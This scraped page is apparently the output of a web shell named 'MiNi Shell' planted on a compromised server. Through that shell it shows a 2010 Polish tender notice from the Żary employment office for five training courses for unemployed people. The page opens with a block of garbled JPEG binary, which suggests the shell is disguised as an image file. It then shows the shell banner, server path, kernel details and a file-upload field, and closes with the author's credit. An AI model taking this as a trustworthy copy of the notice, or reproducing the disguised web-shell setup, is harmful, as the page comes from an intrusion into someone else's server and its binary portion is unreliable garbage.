JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101006/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101006/320872-N-2010.html

<p class="kh_header"><b>Żary: Postępowanie w trybie przetargu nieograniczonego na przeprowadzenie szkoleń dla osób bezrobotnych</b><br>
<b>Numer ogłoszenia: 320872 - 2010; data zamieszczenia: 06.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Mieszka I 15, 68-200 Żary, woj. lubuskie, tel. 068 4791356, faks 068 4791366.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://pup.zary.sisco.info</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Postępowanie w trybie przetargu nieograniczonego na przeprowadzenie szkoleń dla osób bezrobotnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamowienia są usługi szkoleniowe. Zamówienie przedmiotowe podzielono na 5 zadań częściowych.
Zadanie częściowe nr 1: Kasjer sprzedawca z praktyką w handlu - Przedmiotem zamówienia jest przeprowadzenie i organizacja szkolenia grupowego pn. Kasjer sprzedawca z praktyką w handlu dla 20 osób bezrobotnych współfinansowanego ze środków Europejskiego Funduszu Społecznego.
Zadanie częściowe nr 2: Monter konserwator urządzeń instalacji elektrycznych, urządzeń instalacji gazowych i sanitarnych - Przedmiotem zamówienia jest przeprowadzenie i organizacja szkolenia grupowego pn. Monter konserwator urządzeń instalacji elektrycznych, urządzeń instalacji gazowych i sanitarnych dla 10 osób bezrobotnych finansowanego ze środków pieniężnych Funduszu Pracy. 
Zadanie częściowe nr 3: Kurs obsługi komputera od podstaw - Przedmiotem zamówienia jest przeprowadzenie i organizacja szkolenia grupowego pn. Kurs obsługi komputera od podstaw dla 15 osób bezrobotnych finansowanego ze środków pieniężnych Funduszu Pracy. 
Zadanie częściowe nr 4: Kierowca operator wózków jezdniowych podnośnikowych o napędzie silnikowym - Przedmiotem zamówienia jest przeprowadzenie i organizacja szkolenia grupowego pn. Kierowca operator wózków jezdniowych o napędzie silnikowym dla 15 osób bezrobotnych finansowanego ze środków pieniężnych Funduszu Pracy
Zadanie częściowe nr 5: Operator maszyn budowlanych do robót ziemnych klasa III - Przedmiotem zamówienia jest przeprowadzenie i organizacja szkolenia grupowego pn. Operator maszyn budowlanych do robot ziemnych klasa III dla 15 osób bezrobotnych finansowanego ze środków pieniężnych Funduszu Pracy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada wpis do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej. 
Ocena spełnienia warunków udziału w postępowaniu będzie dokonana przez Zamawiającego na zasadzie spełnia/ nie spełnia. W przypadku niespełnienia jakiegokolwiek warunku udziału w postępowaniu Wykonawca zostanie wykluczony z postępowania na podstawie art. 24 ustawy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że zrealizował, w okresie ostatnich trzech lat przed upływem terminu składania ofert - a, jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedno szkolenie będące przedmiotem zamówienia lub szkolenie o podobnej lecz nie odbiegającej od treści programu szkolenia dla grupy co najmniej 10-cio osobowej (dot. każdej czesć zamówienia) oraz dołączy listy referencyjne potwierdzające należyte wykonanie usług zawierające co najmniej informacje: w jakim okresie, dla ilu osób dla jakiej instytucji i czy należycie szkolenie było zrealizowane. 
Ocena spełnienia warunków udziału w postępowaniu będzie dokonana przez Zamawiającego na zasadzie spełnia/ nie spełnia. W przypadku niespełnienia jakiegokolwiek warunku udziału w postępowaniu Wykonawca zostanie wykluczony z postępowania na podstawie art. 24 ustawy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie wykazu bazy techniczno - dydaktycznej. Wykonawca w wykazie wskazuje formę własności. W przypadku sprzętu, maszyn, urządzeń, narzędzi, miejsca szkolenia innych niż własny należy dołączyć odpowiedni dokument potwierdzający pozyskanie sprzętu, maszyn, urządzeń, narzędzi, miejsca szkolenia tj. pisemne zobowiązanie lub przedwstępną umowę na wypożyczenie, wynajem, dzierżawę lub użyczenie w/w. 
Do realizacji zamówienia każdej części Wykonawca musi dysponować co najmniej następującym potencjałem techniczno - dydaktycznym:
Dot. zadania częściowego nr 1 Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje co najmniej 7 sprawnymi kasami fiskalnymi, w tym co najmniej 4 rodzajami różnych kas.
Dot. Zadania częściowego nr 2
Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje 
warunkami lokalowymi oraz sprzętem niezbędnym do prowadzenia wykładów i zajęć praktycznych będącym przemiotem zamówienia. 
Dot. Zadania częściowego nr 3 Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje co najmniej 15 samodzielnymi stanowiskami komputerowymi z zainstalowanym oprogramowaniem niezbędnym do realizacji tematyki przedmiotu zamówienia. 
Dot. Zadania cześciowego nr 4
Zamawiajacy uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje co najmniej jednym wózkiem jezdniowym podnośnikowym o napędzie silnikowym.
Dot. Zadania cześciowego nr 5
Zamawiajacy uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje co najmniej dwiema maszynami budowlanymi w każdej specjalności tj.: koparka, ładowarka, koparko - ładowarka.
Ocena spełnienia warunków udziału w postępowaniu będzie dokonana przez Zamawiającego na zasadzie spełnia/ nie spełnia. W przypadku niespełnienia jakiegokolwiek warunku udziału w postępowaniu Wykonawca zostanie wykluczony z postępowania na podstawie art. 24 ustawy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje kadrą wykładowców uprawnionych do realizacji poszczególnej części zamówienia. Osoby wskazane do realizacji zamówienia muszą legitymować się doświadczeniem w postaci przeprowadzenia zajęć w co najmniej 2 szkoleniach dotyczących poszczególnej części zamówienia oraz poziomem wykształcenia, kwalifikacjami lub uprawnieniami zawodowymi niezbędnymi do przeprowadzenia danego kierunku szkolenia.
Ocena spełnienia warunków udziału w postępowaniu będzie dokonana przez Zamawiającego na zasadzie spełnia/ nie spełnia. W przypadku niespełnienia jakiegokolwiek warunku udziału w postępowaniu Wykonawca zostanie wykluczony z postępowania na podstawie art. 24 ustawy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie złożonego przez Wykonawcę oświadczenia, że znajduje się w sytuacji ekonomicznej i finansowej gwarantującej realizację danego zamówienia.
Ocena spełnienia warunków udziału w postępowaniu będzie dokonana przez Zamawiającego na zasadzie spełnia/ nie spełnia. W przypadku niespełnienia jakiegokolwiek warunku udziału w postępowaniu Wykonawca zostanie wykluczony z postępowania na podstawie art. 24 ustawy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Dokument potwierdzający posiadanie wpisu do rejestru instytucji prowadzonego przez Wojewódzki Urząd Pracy ze względu na siedzibę instytucji szkoleniowej w oparciu o Rozporządzenie Ministra Gospodarki i Pracy z dnia 27 października 2004r.(Dz.U. Nr 236, poz 2365). W przypadku  gdy dokument nie będzie wydany z datą 2010 roku należy dołączyć również oświadczenie o dokonaniu jego aktualizacji na rok 2010 (załączniku nr 3 do SIWZ) 
2. Wykaz przeprowadzonych w okresie ostatnich 3 lat przed upływem terminu składania ofert szkoleń w zakresie każdej części zamówienia wraz z listami referencyjnymi lub innymi dokumentami potwierdzającymi należyte zrealizowanie szkolenia ( załącznik nr 6 do SIWZ).
3. Wykaz bazy techniczno - dydaktycznej niezbędnej do wykonania zamówienia (załącznik nr 4 do SIWZ).
4. Wykaz osób przewidzianych do realizacji zamówienia wraz z dokumentami potwierdzającymi kwalifikacje i doświadczenie niezbędne do wykonania zamówienia. W wykazie należy wpisać tylko osoby spełniające warunek podany w pkt. V ppkt.4. W przypadku wykonawców, którzy złożyli ofertę zawierającą w załączniku nr 5 również osoby przewidziane do realizacji zamówienia, które nie spełniają tego warunku, zostaną wykluczeni z postępowania o udzielenie zamówienia (załącznik nr 5 do SIWZ).
5. Oświadczenie wykonawcy, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej realizację danego zamówieni (załącznik nr 8 SIWZ).
6. Wypełniony FORMULARZ OFERTOWY (załącznik nr 1 do SIWZ).
7. Wypełniony PROGRAM SZKOLENIA (załącznik nr 2 do SIWZ). 
8. Wzór zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji jaki otrzymają absolwenci szkolenia.
9. Wzór umowy z za parafowanymi wszystkimi stronami (załącznik nr 9 do SIWZ).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień  umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności takiej zmiany.
Zmiana umowy może być dokonana w następujących okolicznościach:
1)Zmiana osób realizujących przedmiot zamówienia z uwagi na niezależne od tron umowy okoliczności (w szczególności choroba, wypadki losowe, nieprzewidziane zmiany organizacyjne) dotyczące osób kluczowych dla realizacji umowy np. wykładowców lub osób wskazanych do współpracy - z zastrzeżeniem, iż Wykonawca może zaproponować zmianę wykładowcy w uzasadnionych przypadkach na osobę posiadającą równoważne lub wyższe kwalifikacje niż podane w ofercie. 
2)Okoliczności siły wyższej np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://pup.zary.sisco.info<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Żarach
ul. Mieszka I 15 
68-200 Żary.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.10.2010 godzina 08:00, miejsce: Siedziba Zamawiającego (sekretatiat - I pietro) pokój nr 12 Żary, ul. Mieszka I 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Usługi szkoleniowe będą finansowane z Funduszu Pracy oraz w ramach Projektu Europejskie perspektywy - program aktywizacji zawodowej osób bezrobotnych w powiecie żarskim współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kasjer sprzedawca z praktyką w handlu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie i organizacja szkolenia grupowego pn. Kasjer sprzedawca z praktyką w handlu dla 20 osób bezrobotnych współfinansowanego ze środków Europejskiego Funduszu Społecznego.
Uczestnikami szkolenia będą osoby posiadające wykształcenie minimum podstawowe oraz zamieszkujące teren działania PUP w Żarach Filia w Lubsku. 
Celem szkolenia jest nabycie wiedzy i umiejętności w zakresie pracy pracownika działu sprzedaży z obsługą kas fiskalnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Monter konserwator urządzeń instalacji elektrycznych, urządzeń instalacji gazowych i sanitarnych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie i organizacja szkolenia grupowego pn. Monter konserwator urządzeń instalacji elektrycznych, urządzeń instalacji gazowych i sanitarnych dla 10 osób bezrobotnych finansowanego ze środków pieniężnych Funduszu Pracy. 
Uczestnikami szkolenia będą osoby posiadające wykształcenie minimum podstawowe oraz zamieszkujące teren działania PUP w Żarach Filia w Lubsku. 
Celem szkolenia jest nabycie kwalifikacji do wykonywania pracy na stanowiskach eksploatacji na urządzenia, instalacje i sieci elektroenergetyczne o napięciu nie wyższym niż 1kV oraz na urządzenia i instalacje gazowe o ciśnieniu wyższym niż 5 kPa, a także nabycie wiedzy i umiejętności w zakresie instalowania urządzeń sanitarnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs obsługi komputera od podstaw.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie i organizacja szkolenia grupowego pn. Kurs obsługi komputera od podstaw dla 15 osób bezrobotnych finansowanego ze środków pieniężnych Funduszu Pracy. 
Uczestnikami szkolenia będą osoby posiadające wykształcenie minimum podstawowe oraz zamieszkujące teren działania PUP w Żarach Filia w Lubsku. 
Celem szkolenia jest nabycie wiedzy i umiejętności dotyczącymi sprzętu komputerowego, obsługi komputera, pracy z edytorami tekstu - WORD I OPEN OFFICE, obsługi programu EXEL tworzenia prezentacji w POWER POINT, tworzenia baz danych, Internetu, wyszukiwarki, poczty mailowej OUTLOOK..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kierowca operator wózków jezdniowych podnośnikowych o napędzie silnikowym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie i organizacja szkolenia grupowego pn. Kierowca operator wózków jezdniowych o napędzie silnikowym dla 15 osób bezrobotnych finansowanego ze środków pieniężnych Funduszu Pracy
Uczestnikami szkolenia będą osoby posiadające wykształcenie minimum podstawowe oraz zamieszkujące teren działania PUP w Żarach Filia w Lubsku. 
Celem szkolenia jest nabycie wiedzy i umiejętności w zakresie samodzielnego kierowania i obsługi wózków jezdniowych podnośnikowych z napędem silnikowym oraz wyminą butli gazowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Operator maszyn budowlanych do robót ziemnych klasa III..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie i organizacja szkolenia grupowego pn. Operator maszyn budowlanych do robot ziemnych klasa III dla 15 osób bezrobotnych finansowanego ze środków pieniężnych Funduszu Pracy.
Wykonawca przeprowadzi szkolenie z zakresu obsługi dwóch z pośród trzech proponowanych maszyn budowlanych (tj. koparki, ładowarki, koparko - ładowarki), które to uczestnicy szkolenia wybiorą sobie sami po skierowaniu na szkolenie. 
Uczestnikami szkolenia będą osoby posiadające wykształcenie minimum podstawowe oraz zamieszkujące teren działania PUP w Żarach Filia w Lubsku. 
Celem szkolenia jest przygotowanie uczestników do zdania egzaminu kwalifikacyjnego uprawniającego do wykonywania zawodu operatora maszyn budowlanych do robót ziemnych klasa III..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com